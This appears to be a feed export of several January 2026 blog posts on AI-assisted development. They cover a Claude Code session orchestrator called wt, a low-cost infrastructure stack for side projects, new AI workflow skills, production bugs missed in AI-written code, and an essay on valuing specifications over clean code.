You can write clean code. Great. So can Claude. You can architect systems. Wonderful. So can a junior dev with Cursor and four hours.

The skills that matter now are the ones developers historically dismissed as “marketing” or “sales” or “that stuff the business people do.”

Building an audience. Writing content that ranks. Engaging in communities without getting banned for being too promotional. Understanding what people actually want to pay for versus what’s technically impressive.

This is deeply annoying if you became a developer specifically to avoid talking to people.

What to actually do.

Stop adding features to a product nobody’s using. That’s not building — that’s procrastinating with a compiler.

Spend less time in your IDE and more time in the places your customers hang out. Reddit, LinkedIn, niche communities, whatever. Not to drop links. To understand what problems people are actually complaining about and whether your thing solves any of them. (It’s why I’m buildingThreadHQ.)

If your product can be rebuilt in weeks with AI, either pivot to something with real operational complexity, or accept that distribution is your product now and code is just the unlock.

The YC thread suggests payments, compliance-heavy industries, anything where “mistakes actually hurt” and trust is earned over years. The SaasDevelopers thread suggests becoming a distribution machine: 20+ platform launches, daily content, systematic visibility.

Both are right. Pick your poison.

The uncomfortable synthesis.

AI commoditized the build. What’s left is everything around it: who knows about you, who trusts you, and how painful it would be to switch away.

The code was never the product. Now it’s just impossible to pretend otherwise.

]]>

Why I'm Building an Agent Orchestrator

Lakshmi Narasimhan — Tue, 20 Jan 2026 00:00:00 +0000

I have a confession.

I’ve been running multiple Claude Code sessions manually. Like some kind of air traffic controller using Post-it notes.

Terminal 1: auth refactor.

Terminal 2: API pagination.

Terminal 3: that bug I said I’d fix last week.

Tab. Check. Tab. Check. Tab. “Wait, which one was working on the tests?”

Nobody should have to live like that.

The One-Session Bottleneck

Here’s the thing about Claude Code: it’s incredible at focused work. Give it a well-defined task, point it at the right files, and it’ll churn through code faster than you can review it.

But “focused” is doing a lot of heavy lifting there.

One session means one task. One context. One thread of execution. While Claude is refactoring your auth system, it’s not touching your API. While it’s writing tests, it’s not fixing that bug.

You, meanwhile, are the bottleneck. The dispatcher. The human scheduler runningtmux attach -t session-3 forty times a day.

I tried to solve this the obvious way: more sessions. Three terminals. Four. At one point, six.

My M2 Mac doesn’t have fans. It just gets warm and sad. The UI started lagging. Keystrokes took a second to register. Activity Monitor looked like a stock chart during a crash.

I Tried Gastown

Steve Yegge builtGastown - a full agent orchestration system. Polecats, refineries, convoys, molecules, mayors, witnesses, deacons. It’s ambitious. It’s thorough.

I wanted to love it.

I really did.

I spent a week trying to wrap my head around the abstraction layers. Rigs containing polecats containing worktrees. Routes pointing to mayors pointing to beads. Molecules with formulas that become protomolecules that become digests.

Then I spawned 6 polecats for 6 well-groomed tasks.

My system hung. Not “slow” hung. “Is this thing even on?” hung.

Turns out each polecat is a full Claude session. Six sessions competing for API calls, memory, and CPU cycles. The parallelism I wanted was theoretical. The system thrashing was very, very real.

The core issue? Gastown is a coordination layer, not an executor. You still manuallygt sling each task. There’s no “run these 6 serially while I do other things.” The dispatcher is still you.

I’m not knocking it. The persistence model is solid - sessions can crash and recover context. The beads integration works. The architecture is thoughtful.

But for my brain, the complexity-to-benefit ratio didn’t compute. I needed something simpler.

What’s Actually Non-Negotiable

After a month of manual orchestration and a week of Gastown experimentation, I’ve landed on what actually matters:

1. Beads Integration

This isn’t optional.Beads is how I track work - git-backed issues with dependencies, labels, and full history. Every task is a bead. Every worker needs to know which bead it’s working on.

No beads, no deal.

2. Worktree Isolation

Each worker gets its own git worktree. Not a branch. A worktree.

Why? Because when Worker A is refactoring auth and Worker B is adding pagination, they cannot be stepping on each other’s files. Worktrees give you physical isolation - separate directories, separate working states, zero merge conflicts during work.

When they’re done, you merge. Not before.

3. Reliable Prompt Delivery

This one took me a while to figure out.

You spawn a session. You send it a prompt. Simple, right?

Except tmuxsend-keys doesn’t care if Claude is ready. It just blasts text into the pane. If Claude hasn’t fully initialized, your prompt arrives before there’s anything to receive it.

The fix: detect when Claude is actually running (not just a shell), wait for UI initialization, then send with proper debouncing and retry logic.

Sounds obvious in retrospect. Cost me hours of “why isn’t this working?”

4. Visual Monitoring Without Babysitting

I need to see what’s happening across all workers. But I don’t want to tab through terminals.

A dashboard. Live status. Which worker is active, which is idle, which is stuck. One glance, full picture.

And critically: switching to a worker shouldn’t kill the dashboard. The monitoring should keep running while I’m working.

Early wt screenshot with wt watch on the side.

wt watch- All workers, one glance. No tab-switching required.

5. Simplicity

One binary. Tmux (which I already use). Beads (which I already use). Git worktrees (which are just git).

No mayors. No deacons. No protomolecules. No routing tables pointing to other routing tables.

If I can’t explain the mental model in 30 seconds, it’s too complex.

So I’m Building It

It’s calledwt (worktree). The core workflow:

Grooming is sacred. I run dedicated Claude Code sessions where I don’t write code - I think out loud. “We need pagination on this API. The auth middleware is getting messy, let’s refactor it. Oh, and that bug from last week.”

Claude helps me turn those thoughts into beads. Sets priorities. Adds dependencies. The interaction is conversational, not CLI gymnastics.

me: "let's break down the user dashboard feature"
claude: [creates 4 beads with dependencies, P1 for the data layer, P2 for the rest]
me: "the caching one blocks the others"
claude: [adds dependency links]

The better the grooming, the more autonomous the workers can be. Then execution is just:

wt ready # What's unblocked?
wt new proj-123 # Spawn a worker
wt hub # Watch them work

But it grew legs. Session lifecycle (wt done,wt abandon,wt signal). History and resumption (wt seance - yes, you can talk to dead sessions). Autonomous batch mode (wt auto). Context handoff (wt handoff,wt prime).

wt project list showing registered projects with their paths and bead counts. wt itself is built using wt, I know, so meta.

Multiple projects, one tool. Each with its own beads, worktrees, and workers.

The commands multiplied, but the mental model stayed simple: projects contain beads, beads spawn workers, workers live in worktrees, hub watches everything.

Next post: I’ll walk through the architecture - why tmux, why worktrees, and the surprisingly tricky problem of “how do you know when Claude is ready to receive input?”

]]>

The $30/Year Stack for Launching Small Bets

Lakshmi Narasimhan — Mon, 19 Jan 2026 00:00:00 +0000

Every time I launch a new small bet, I need the same boring stuff: professional email, a chat widget, uptime monitoring. The kind of infrastructure that’s completely unsexy but makes you look like you have your act together.

For years, I overcomplicated this. Custom SMTP servers. Self-hosted monitoring. Elaborate setups that took days to configure and broke whenever I looked at them wrong.

Then I realized something: I was spending more time on infrastructure than on validating whether anyone wanted my product.

So I built a repeatable stack. Total cost: about $30-42 per year, per small bet. Here’s the whole thing.

Domain & Hosting: Cloudflare (Free)

Buy your domain wherever you want, but point the nameservers to Cloudflare immediately.

Cloudflare’s free tier is absurd:

DNS management (fast, reliable)
Free SSL certificates (automatic)
DDoS protection
CDN caching
Cloudflare Pages (unlimited sites, unlimited bandwidth)

That last one is key. Your landing page goes on Cloudflare Pages. Connect your repo, push to main, it deploys. No servers. No bills. No thinking about infrastructure when you should be thinking about whether anyone wants your product.

I run every small bet’s landing page on CF Pages. Zero hosting cost.

Email: Google Workspace (The India Pricing Hack)

You want professional email.hello@yourdomain.com, notyourdomain.help@gmail.com like some kind of digital nomad running a dropshipping scam.

Google Workspace direct pricing: $6/month. Painful when you’re running multiple bets.

Google Workspace through an Indian reseller: Rs.125/month. That’s roughly $1.50.

Same product. Same Gmail experience. Same everything. Just… cheaper, because regional pricing exists and Google apparently forgot to close this loophole.

Recommended resellers: Medha Cloud, Host IT Smart, Shivaami. They’re authorized, they’re legit, and they’ll save you $50+/year per domain.

Setup takes 30 minutes: verify domain, add MX records, configure SPF/DKIM/DMARC so your emails don’t land in spam. Done.

Support: Crisp Chat (Free)

Intercom wants $74/month. For a small bet that might make $0.

Crisp’s free tier gives you:

2 team seats (it’s just you anyway)
Unlimited conversations
Mobile app for notifications
A widget that doesn’t look like it was designed in 2008

Copy-paste their script tag into your landing page. Five minutes.

Upgrade trigger: when you have so many support conversations that you need automation. Which means you have customers. Which means you can afford to pay for things.

Monitoring: BetterStack (Free)

Your app will go down at 3am on a Sunday. This is not a prediction, it’s a guarantee.

BetterStack’s free tier:

10 uptime monitors
1GB logs/month
Email and Slack alerts
3-day log retention

Is 3-day retention enough? For a small bet you’re validating? Yes. You’re not running a bank.

Alternative: Axiom gives you 500GB ingest and 30-day retention if you’re logging more aggressively. Also free.

Error Tracking: Sentry (Free)

Your code will throw exceptions in production that never happened locally. Classic.

Sentry’s free tier:

5K errors/month
10K performance transactions
1 user
90-day retention

For a small bet, 5K errors/month is plenty. If you’re hitting that limit, either your app is broken or you have enough users to pay for it.

Database: Supabase (Free Tier or Self-Hosted)

Every small bet needs a database. Supabase’s free tier is genuinely useful:

500MB database
1GB file storage
50K monthly active users
Unlimited API requests

That’s enough to validate most ideas. The catch: you get 2 free projects total. After that, it’s $25/month per project.

For small bets that graduate to real products, I self-host Supabase on a $6/month Hetzner VPS. Full Postgres, auth, storage, realtime — no project limits, no usage caps. (I’m building a service called Supabyoi to make this dead simple. More on that soon.)

The Complete Stack

Domain — ~$10-15/year
Cloudflare (DNS + Pages) — Free
Google Workspace (India) — ~1.50/month( 1.50/month( 18/year)
Crisp — Free
BetterStack — Free
Sentry — Free
Supabase — Free

Total: ~1.50/month, 1.50/month, 30-42/year

That’s DNS, hosting, professional email, live chat, uptime monitoring, error tracking, and a database for less than a single month of most “startup” tools.

The Rules

Don’t upgrade until you have paying customers. Free tiers exist for validation. Use them.

Keep the setup identical across bets. Same tools, same patterns, same DNS records. You should be able to launch a new bet’s infrastructure in an afternoon, not a weekend.

Resist the urge to self-host. Yes, youcan run your own mail server. You can also perform your own dental surgery. Neither is advisable.

When To Actually Upgrade

Google Workspace — You need >30GB storage → $7/mo
Crisp — You need chatbots or >2 team members → $25/mo
BetterStack — You’re pushing >1GB logs/month → $24/mo
Sentry — You’re hitting 5K errors/month → $26/mo
Supabase — You need >2 projects or more storage → $25/mo (or self-host)

Notice a pattern? These are all “you have real traction” problems. Good problems to have.

What’s Not Covered (Yet)

This is the skeleton — the basic infrastructure every small bet needs from day one.

I’ll cover these in separate posts:

Tech stack choices (frameworks, languages, deployment)
Payment processing (Stripe, Lemon Squeezy, regional considerations)
CI/CD pipelines (GitHub Actions, deployment automation)
Landing page patterns (what actually converts)

One thing at a time.

The Point

Infrastructure should be invisible. It should cost almost nothing while you’re validating. It should scale up only when you have revenue to pay for it.

$30/year per bet means you can run 10 small bets for less than most people pay for a single Notion subscription.

Stop building infrastructure. Start shipping products.

This is part of my “Deploy” series — simple infrastructure patterns for solo operators who’d rather build products than manage servers.

]]>

90% of Programming Skills Just Got Commoditized. The Other 10% Is Worth 1000X More.

Lakshmi Narasimhan — Thu, 15 Jan 2026 00:00:00 +0000

Andrej Karpathy recentlywrote something that’s been rattling around my head:

“I’ve never felt this much behind as a programmer. The profession is being dramatically refactored as the bits contributed by the programmer are increasingly sparse and between. I have a sense that I could be 10X more powerful if I just properly string together what has become available over the last year and a failure to claim the boost feels decidedly like skill issue.”

He then listed what this new layer looks like: agents, subagents, prompts, contexts, memory, modes, permissions, tools, plugins, skills, hooks, MCP, LSP, slash commands, workflows, IDE integrations.

His conclusion: “Clearly some powerful alien tool was handed around except it comes with no manual and everyone has to figure out how to hold it and operate it, while the resulting magnitude 9 earthquake is rocking the profession.”

I felt this in my bones.

The Old Stack vs The New Stack

The old programming stack was hard enough:

Hardware -> OS -> Language -> Frameworks -> Your Code

Years of learning. Layers of abstraction. But at least it wasdeterministic. At least there were manuals. At least Stack Overflow had answers.

The new stack adds a layer on top:

You -> Prompts/Agents/Context/Memory/Tools/Modes -> Code

This layer is fundamentally different. It’s stochastic. It’s fallible. It’s unintelligible. And it changes every few weeks.

There’s no certification. There’s no textbook. There’s no “Effective AI Orchestration” by Joshua Bloch. Just a bunch of people figuring it out in Discord servers and sharing CLAUDE.md files and best practices like trading cards.

The Divide Is Already Here

Someone on Redditdescribed the pattern they’re seeing on their team:

“Two developers with similar experience working on similar tasks, but one consistently ships features in hours while the other is still debugging. At first I thought it was just luck or skill differences. Then I realized what was actually happening — it’s their instruction library.”

They’re watching an underground collection of power users share workflows like secrets:

Commands that automatically debug entire codebases
CLAUDE.md files that turn Claude into domain experts
Slash commands that turn 45-minute processes into 2-minute ones

Meanwhile, most people are still typing “help me fix this bug” and wondering why their results suck.

As one developer put it: “The differences between someone who opens up CC for the first time and someone with tuned md files is beyond night and day.”

The Skill Issue Is Real (But Not The One You Think)

Here’s what hit me about Karpathy’s framing: he called it a “skill issue.”

Not a tools issue. Not an access issue. Not a funding issue.

Askill issue.

The 10X boost exists. The leverage is real. But claiming it requires mastering something that didn’t exist two years ago and has no curriculum.

Someone in that same thread nailed the uncomfortable truth: “90% of traditional programming skills are becoming commoditized while the remaining 10% becomes worth 1000x more. That 10% isn’t coding — it’s knowing how to architect AI workflows.”

The irony is brutal. We spent years mastering syntax, frameworks, design patterns. Now an AI can generate all of that in seconds. What itcan’t do is orchestrate itself effectively. That’s your job now.

What The New Layer Actually Looks Like

Let me make this concrete. Here’s what I’ve had to learn in the past year that wasn’t part of any CS curriculum:

CLAUDE.md Architecture

Your instructions file isn’t documentation. It’s programming. The structure, the phrasing, what you include vs exclude — these decisions compound across every interaction. A well-architected CLAUDE.md is worth more than a well-architected codebase.

Context Management

Every token matters. MCP servers eat context. Long conversations drift. You need to think about what Claude knows, what it’s forgotten, when to compact, when to start fresh. It’s memory management, but for a mind that isn’t yours.

Prompt Design

Not “prompt engineering” in the LinkedIn-influencer sense. Actual design. When do you give examples? When do you constrain? When do you let it explore? How do you phrase things so it doesn’t hallucinate? How do you trigger deeper thinking? These are learnable skills with massive payoff differences.

Tool Orchestration

MCP, skills, hooks, slash commands. Which tool for which job? When does an MCP server make sense vs a bash script vs a skill file? How do you chain them? How do you debug when the chain breaks?

Mode Awareness

Plan mode vs implement mode. When to let Claude explore vs when to constrain. When to use subagents. When to go linear. Themeta of working with AI — knowing when to switch approaches — is itself a skill.

Verification Choreography

AI generates fast. Verification is the bottleneck. How do you structure your workflow so you’re not just rubber-stamping garbage? How do you catch the 8 production bombs before they ship? (Yes,I wrote about this.)

The Manual That Doesn’t Exist

An older developer on Redditcaptured the frustration:

“I started using AI about 2 years ago. I thought I was doing good, but then I started seeing all this stuff about MCP servers, md files etc and I am kind of lost. I want to learn more and I want to improve my AI skills but it’s difficult for me.”

This is someone with decades of experience, feeling lost because the new layer has no onramp.

The manual doesn’t exist because the platform keeps shifting. Claude Code ships updates weekly. New features appear. Old patterns stop working. The MCP ecosystem is exploding. Skills just launched. Hooks changed. The ground won’t stop moving.

You can’t study for an earthquake. You can only practice surfing.

How I’m Learning (Imperfectly)

I don’t have this figured out. Nobody does. But here’s what’s working:

Steal shamelessly. Find people who are clearly more productive and reverse-engineer their setup. Their CLAUDE.md files, their slash commands, their workflows. GitHub repos, Discord servers, Reddit threads. The good stuff is scattered but findable.

Treat your setup as code. Version control your CLAUDE.md. Iterate on your slash commands. When something works, document why. When something fails, autopsy it. Your instruction library is a codebase now.

Invest in meta-skills. The specific tools will change. MCP might get replaced. Claude Code might get competition. But the meta-skills — context management, prompt design, verification choreography — those transfer.

Actually use the new features. Hooks exist. Subagents exist. Skills exist. Most people ignore them because they’re “advanced.” They’re not advanced. They’re just new. The learning curve is the moat.

Teach to learn. Writing about this forces me to understand it. Explaining my setup to others reveals the gaps. The best way to master the new layer is to articulate it.

The Uncomfortable Conclusion

Karpathy is right. There’s a 10X boost available. Failing to claim it is a skill issue.

But it’s anew skill. One that didn’t exist before. One that has no manual, no certification, no clear path.

The people figuring it out are building compound advantages. Every custom command, every refined CLAUDE.md pattern, every workflow optimization — it all stacks. The gap between those who master the new layer and those who don’t is widening fast.

The earthquake is still happening. The alien tool is still being figured out. The manual is being written in real-time by the people using it. And the rules are being changed as we speak/code/write.

Roll up your sleeves.

This is a companion to my previous essay onwhat Claude can’t do for you. That one covered the old skills that still matter. This one covers the new skills you need to add.

]]>

Claude Code Is Incredible. It Also Almost Shipped 8 Production Bombs Last Week.

Lakshmi Narasimhan — Mon, 12 Jan 2026 00:00:00 +0000

What 15 years of production scars are still good for

Last week I caught eight bugs across three projects. Not typos. Not missing semicolons. Real, ship-breaking, production-melting problems that would have sailed right past code review and into the waiting arms of actual users.

Claude Code wrote the code. Claude Code passed the tests. Claude Code would have happily deployed it.

And Claude Code had no idea anything was wrong.

I’ve written aboutcomprehension debt and argued thatclean code is dead. But here’s the uncomfortable third act: even if you understand your specs perfectly and verify your outcomes ruthlessly, there’s a whole category of knowledge that AI simply doesn’t have.

Call it production intuition. Call it battle scars. Call it “I’ve been burned by this exact thing before.”

Whatever you call it, you can’t prompt your way into it.

The Localhost Delusion

Here’s what AI is optimized for: making code that works on your machine, right now, with your current data, under ideal conditions.

Here’s what AI is catastrophically bad at: imagining your code running on three replicas behind a load balancer at 3am when the database is under pressure and someone’s running a batch job that nobody documented.

A Fortune 100 developer on Redditput it bluntly: “There’s a lot of vibe coded slop that works well for MVP but will absolutely fall apart under stress and within production environments once they scale to more users. It doesn’t really reveal itself until later when it’s much more difficult to fix.”

Later. When it’s difficult. The horror.

Let me walk you through what “later” looked like for me this week.

Pattern 1: Production Blindness

The Concurrency Landmine

I’m building a tool that routes MCP calls. Claude wrote it in Python — clean, well-structured, exactly what I asked for. Worked beautifully in testing. One request, one response, everybody’s happy.

Then I imagined what happens when three Claude Code sessions hit it simultaneously.

Oh.

Oh no.

Python’s threading model and the phrase “parallel requests” get along about as well as cats and bathtubs. Claude’s solution? More Python. Refactor this, optimize that. Very confident. Would’ve worked for lower concurrency.

But I knew this thing needed to handle dozens of parallel sessions. I prompted it to rewrite in Go. Claude nailed the port — goroutines, channels, the works. Problem solved in an afternoon.

The code was excellent. The language selection wasn’t. Claude optimizes brilliantly within the box you give it. It just won’t question whether you’re in the right box.

The Replicas Problem

Auth rate limiting. Claude implemented it in-memory with a clean sliding window algorithm. Textbook correct. Tests pass. Ship it.

One replica: perfect.
Two replicas: every user gets double the rate limit.
Three replicas: chaos.

This is distributed systems 101. The kind of thing you learn after you’ve been paged at 2am because someone figured out they could hit your API from three different IPs and get 3x the rate limit.

When I pointed this out, Claude immediately suggested Redis-backed rate limiting with proper distributed locking. Great solution. But it didn’t think about replicas until I did. Claude builds for the deployment model you describe. If you don’t describe it, localhost is the default.

The Sync Task Landmine

An API endpoint runs a long-running task. Claude implemented it synchronously — straightforward, easy to understand, does exactly what the tests verify.

Deploy it. First user clicks the button. 30-second timeout. 504 Gateway Timeout.

When I explained the problem, Claude refactored it to Celery with proper task queuing, retry logic, and status polling. Solid implementation. Took maybe 20 minutes.

But here’s the thing: I only caught it because I tested the actual user flow, not just the unit tests. Claude implemented what I asked for. I didn’t ask for “an endpoint that won’t timeout in production.” That’s on me. But it’s also the kind of thing I’ve learned to check after watching synchronous endpoints die approximately 47 times.

Pattern 2: Ecosystem Amnesia

The Deprecation You Won’t Find on Stack Overflow

Supabase deprecated their API keys. Not in a big announcement. Not in the docs you’d naturally read. In aGitHub discussion with 43 comments and a lot of confused developers.

I found out because I read the discussion. I then had to fix three separate projects.

Claude doesn’t read GitHub discussions. Claude doesn’t know what the community is grumbling about. Claude’s knowledge is frozen in time, and the ecosystem keeps moving.

The “Works But Wrong” Framework Choice

Claude encrypted secrets at rest using Fernet keys. Technically correct. Cryptographically sound. Tests pass. Secure enough.

But I’m using Supabase. Supabase has a vault feature built specifically for this. When I mentioned it, Claude migrated everything over cleanly — proper RLS policies, the works.

The Fernet implementation wasn’twrong. It just wasn’t theright choice for this stack. Supabase vault means one less thing I manage, one less key rotation I handle, one less piece of infrastructure to think about.

Claude doesn’t know the zeitgeist of “what’s the idiomatic way to do this in Supabase.” That knowledge lives in community forums, Discord servers, and the muscle memory of people who’ve shipped Supabase apps before.

The Build System That Wasn’t

I made UI mockups with Tailwind CSS(using Claude, to be fair). Told Claude to use them. Claude happily served Tailwind from a CDN.

In development? Fine.
In production? Every page load fetches the entire Tailwind library. Uncompiled. Unoptimized. Approximately 300KB of CSS you don’t need.

Claude knows what Tailwind is. Claude doesn’t know that real projects compile it. That’s the kind of tribal knowledge you pick up by shipping things and watching your Lighthouse scores crater.

Pattern 3: Verification Vacuum

The Cache That Wasn’t

Database queries were getting slow. I asked Claude to add a caching layer. Claude wrote a beautiful Redis caching module — proper TTLs, cache invalidation on writes, the works. Tests for the module passed. I shipped it, watched the deployment go green, felt the warm glow of productivity.

The cache wasn’t being hit.

Claude built an excellent caching module. Claude did not check whether the actual query functions werecalling the cache. The module worked perfectly. Nothing was using it. Every request still hit the database directly.

I discovered this by checking Redis after a few hundred requests. Empty. Revolutionary debugging technique, I know.

Could tests have caught this? Sure. Integration tests that verify “when I make this API call, Redis gets a cache entry.” But I’d need to know to write that test. Claude wrote unit tests for the caching module. I should have asked for end-to-end verification. The knowledge that “modules can exist without being properly wired up” is experience. Pattern recognition. The scar tissue from shipping features that weren’t actually features before.

Pattern 4: Architectural Judgment

The Multitenancy Time Bomb

A project using Qdrant vector database. Users store embeddings. Multiple users. Shared infrastructure.

The question that should wake you up at night: Can User A see User B’s data?

Claude’s implementation used collection-level isolation with proper tenant IDs in the filter queries. Reasonable approach. Worked in my tests.

But a thorough multitenancy review? The kind where you trace every query path, every edge case, every possible way data could leak between tenants? Where you think about what happens if someone forgets to pass the tenant filter? Where you consider whether the default behavior is secure-by-default or insecure-by-default?

That review took me two hours. Claude can helpexecute the fixes I identify, but it won’t spontaneously think “hey, multitenancy is a critical architectural decision that deserves paranoid scrutiny.”

Get multitenancy wrong and you’re on the front page of Hacker News, and not in the good way. Claude builds features. You build threat models.

What The Discourse Gets Wrong

Here’s what bothers me about the AI discourse: both sides are missing the point.

The AI skeptics say “AI code is garbage, don’t use it.” That’s wrong. Claude Code is incredibly useful. I ship faster. I handle complexity I couldn’t handle alone. The leverage is real.

The AI evangelists say “AI will replace developers, just describe what you want.” That’s also wrong. Describing what you want is theeasy part. Knowing what youshould want — that’s where the experience lives.

Someone on r/ExperiencedDevsnailed it: “Coding is the boring/easy part. Typing is just transcribing decisions into a machine. The real work is upstream: understanding what’s needed, resolving ambiguity, negotiating tradeoffs, and designing coherent systems.”

The developers who thrive aren’t the ones who write the most code. They’re the ones who catch the multitenancy bug before it ships. Who know that in-memory rate limiting won’t scale. Who’ve been burned by synchronous endpoints and CDN-served CSS and proxies that aren’t wired up.

Experience isn’t knowing the syntax. Experience is knowing the failure modes.

What’s Actually Worth Learning

So what’s worth learning when AI can write the code?

Production Thinking

This is the big one. Every example above comes back to it: Claude builds for localhost, you build for production.

Concretely, this means developing instincts for questions like:

“What happens when there are multiple replicas?” (Rate limiting, session state, caching, file storage — anything in-memory becomes a distributed systems problem)
“What happens under load?” (Synchronous operations become timeouts. N+1 queries become database meltdowns. That “fast enough” endpoint becomes a bottleneck)
“What happens when dependencies fail?” (Database is slow. External API is down. Redis is unreachable. Do you degrade gracefully or explode?)
“What happens at 3am when nobody’s watching?” (Background jobs. Retry logic. Dead letter queues. The things that fail silently)

How do you learn this? You can’t shortcut it. You deploy things. You watch them break. You read post-mortems. You get paged. You develop a paranoid imagination for failure modes.

But you can accelerate it: before you ship, spend 10 minutes imagining the deployment. Draw the boxes. How many instances? What’s in front of them? Where’s the state? What’s shared? This exercise catches 80% of the issues I described above.

Ecosystem Intuition

This is knowing thezeitgeist of your stack — not just what’s possible, but what’s idiomatic. What the community actually uses. What’s deprecated but still in the docs. What’s new but not proven.

Concretely:

Read the GitHub discussions, not just the docs. That’s where deprecations get announced, migration paths get debated, and footguns get documented.
Follow the maintainers on Twitter/X or Bluesky. They’ll tell you about breaking changes before the docs catch up.
Lurk in Discord servers. The “how should I do X” discussions reveal what’s considered best practice.
Actually ship with the stack. The difference between “I’ve read about Supabase” and “I’ve shipped three apps with Supabase” is enormous.

The goal: when Claude suggests an approach, you can immediately sense whether it’s the “right” way or just “a” way. Fernet encryption vs Supabase vault. CDN Tailwind vs compiled Tailwind. Redis rate limiting vs in-memory rate limiting. These aren’t in the documentation. They’re in the collective experience.

Architectural Paranoia

Some decisions are easy to change later. Some aren’t. Knowing the difference is half of senior engineering.

The ones that are hard to reverse:

Multitenancy model: Shared database with tenant IDs? Separate schemas? Separate databases? Choose wrong and you’re rewriting everything.
Auth architecture: Where do tokens live? How do sessions work? What’s the refresh flow? Changing this later breaks every client.
Data model fundamentals: Relational vs document. Normalized vs denormalized. Adding a column is easy. Restructuring your entire data model is not.
API contract design: Once clients depend on your response shape, changing it is a versioning nightmare.

For each of these, Claude will happily implement whatever you ask. It won’t stop and say “are you sure about this? This is hard to change later.” That paranoia is your job.

My rule: for any architectural decision I can’t easily reverse, I spend at least an hour thinking about alternatives before I let Claude write the first line.

Verification Instincts

What should you test for? What’s easy to get wrong? Whatlooks done but isn’t actually wired up?

This is pattern recognition from past failures. The cache that wasn’t being hit. The feature flag that was never checked. The error handler that swallowed exceptions silently.

Concretely:

Test the user flow, not just the units. My caching module passed all its unit tests. The integration was broken. If I’d tested “make this API call and verify Redis has an entry,” I’d have caught it immediately.
Verify your assumptions. Claude wrote the code, but did the code actually getused? Add a log line. Check the network tab. Confirm reality matches intention.
Break it on purpose. What happens when you pass invalid input? What happens when the database is slow? What happens when the auth token is expired? Claude tests the happy path. You test the sad path.

The underlying skill: developing a checklist of “things that can look done but aren’t” for your specific domain. Every time you get burned, add it to the list. Eventually, you check these instinctively.

The Uncomfortable Conclusion

A freelance developer with 8 years of experiencedescribed a pattern he’s seeing across multiple clients: companies paying good money for internal software that barely works. Same symptoms every time. AI-generated comments. Algorithms that make no sense. Inconsistent patterns.

“Yes it mostly works,” he wrote, “but does so terribly to the point where it needs to be fixed.”

The era of AI slop cleanup has begun. And the people doing the cleanup are the ones who know what production actually looks like.

Claude builds for localhost. You build for production.

That gap is where your fifteen years live. And it’s not getting smaller.

This is the third essay in an accidental trilogy. First:comprehension debt is real. Second:clean code is dead. This one: the skills that matter more now, not less.

]]>

Clean Code Is Dead. Long Live Clean Specs.

Lakshmi Narasimhan — Fri, 09 Jan 2026 00:00:00 +0000

Steve Yegge shipped 225,000 lines of Go code he’s never read.

Let that sink in.

Beads — his coding agent memory system — is used by tens of thousands of developers daily. It’s 100% vibe coded. Yegge has never looked at a single line. Same with his new project,Gastown. Three weeks old, 100% vibe coded, never seen the code, never plans to.

His reaction to anyone uncomfortable with this? “Get out now.”

The Heresy

For two decades, we’ve been taught that code is literature. Uncle Bob’s Clean Code. Martin Fowler’s Refactoring. Elegant variable names. Single responsibility. Code should read like prose.

We optimized for human comprehension because humans had to maintain it.

But what if that’s no longer true?

Simon Hoiberg put it bluntly: “Half my code is now written by AI, and the other half is read by AI to fix bugs. Optimizing for human readability is becoming pointless.”

The audience for your code has changed. And it’s not you anymore.

The Other Day I Wrote About Comprehension Debt

I argued that vibe coding creates legacy code from day one. That velocity without comprehension isn’t velocity — it’s procrastination with extra steps.

I still believe that. Mostly.

But here’s the uncomfortable follow-up question: What if comprehension debt only matters whenyou have to pay it?

If AI writes the code and AI debugs the code and AI refactors the code… who exactly needs to understand it?

The New Contract

The old contract: Write clean code so humans can read it.

The new contract: Write code that produces correct outcomes, verified by tests that humans can understand.

This is a crucial shift. The code becomes disposable infrastructure. The tests become the spec. The behavior becomes the product.

Steve Yegge doesn’t need to understand 225,000 lines of Go. He needs to understand what Beads should do. The tests verify that it does it. The code is just… implementation detail. An artifact. A byproduct.

Clean Specs > Clean Code

Here’s the heretical thought experiment:

What if “clean code” principles should now apply to your specifications instead of your source code?

Think about it:

Readable intent: Your specs should be crystal clear. “Users can checkout with valid payment. Invalid cards show an error. Empty carts can’t checkout.”
Single responsibility: Each spec describes one behavior. Not implementation — behavior.
Self-documenting: Specs are the documentation that gets executed. They describe what the system should do, and you verify it actually does.
Easy to modify: When requirements change, you update the spec first. AI updates everything else.

The source code can be a tangled mess of AI-generated spaghetti. Who cares? If you can clearly specify what you want and verify you got it, the implementation is just a detail.

The Yegge Paradox

Here’s what’s wild. In the Vibe Coding book Yegge co-authored with Gene Kim, “Steve” is described as reviewing 10,000 lines of code a day, throwing away 10 lines for every line kept.

Wait. He reviews code? I thought he never looks at it?

The answer, I think, is this: He reviewsoutcomes. He reviews test results. He reviews whether the thing works. He’s not reading code for elegance or comprehension. He’s running it, breaking it, verifying it.

The code review has become a behavior review.

What This Means for You

I’m not saying burn your Clean Code book. (Okay, maybe I am. That thing is 400 pages of what could’ve been a blog post.)

But consider this workflow:

Specify the behavior — in plain language. “Users can checkout with valid payment. Invalid cards show an error. Empty carts can’t checkout.”
Let AI write the tests — it turns your specs into executable verification
Let AI write the implementation — who cares if it’s ugly
Verify the outcomes — does it do what you specified? Try to break it. Edge cases covered?
Ship it — the code is a means to an end

If something breaks, you don’t debug the code. You describe the broken behavior. AI writes a failing test. AI fixes the implementation. You verify the outcome. You never had to understand the implementation. You just had to understand what you wanted.

The Catch

There’s always a catch.

This only works if your specifications are actually good. If your specs are vague, incomplete, missing edge cases — you’re in the worst of both worlds. Incomprehensible code that doesn’t even do what you need.

That’s not vibe coding. That’s vibes-all-the-way-down coding. And that’s how you get 18 out of 20 CTOs reporting production disasters.

The discipline has to go somewhere. If you’re not putting it into clean code, you damn well better be putting it into clear specifications and ruthless outcome verification.

The Real Skill Shift

Old skill: Writing elegant, maintainable code that other humans can understand.

New skill: Specifying behavior precisely and verifying outcomes ruthlessly.

The developers who thrive won’t be the ones who write the cleanest code. They’ll be the ones who can articulate exactly what they want. Who can break their own systems. Who can look at a feature and immediately think of ten ways it could fail.

Code literacy is becoming specification literacy. The new “clean code” is clear intent.

The Uncomfortable Conclusion

We spent twenty years optimizing for human readers who are increasingly being replaced by AI readers.

Maybe Steve Yegge is right. Maybe the code doesn’t matter. Maybe it never really mattered — we just didn’t have anything better.

What matters is: Does it work? Can you prove it? Can you verify it still works after changes?

Clean code was a proxy for those questions. A good heuristic when humans had to debug.

Clean specs answer those questions directly.

The code is dead. Long live the specs.

This is a follow-up to myrecent essay on comprehension debt. The tension is real: you need to understand the problem deeply enough to specify it clearly, but maybe not the implementation at all. Where that line is… I’m still figuring out.

]]>

I Stopped Buying SaaS Boilerplates. Here's What I Buy Instead.

